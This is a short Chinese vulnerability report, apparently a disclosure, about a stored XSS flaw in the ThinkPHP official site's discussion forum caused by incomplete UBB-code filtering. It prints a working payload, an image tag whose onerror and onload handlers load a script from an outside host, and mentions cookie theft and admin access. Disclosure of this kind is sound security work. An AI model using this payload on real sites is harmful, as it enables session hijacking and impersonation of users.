Thinkphp官方网站存储型XSS漏洞一枚
简要描述: 可以在小洞上自由发辉成大洞 XSS小洞一个 详细说明: 讨论区发布话题对UBBcode未过滤完全 imge2.jpg"onerror="jQuery.getScript'http://1.tengzhou8.sinaapp.com/tp.js'" onload="jQuery.getScript'http://1.tengzhou8.sinaapp.com/tp.js'/img 危害:现在我只是小小的利用了一下赞和收藏功能,可模仿用户进行任意操作,盗COOKIE,登后台,危害较大 漏洞证明:...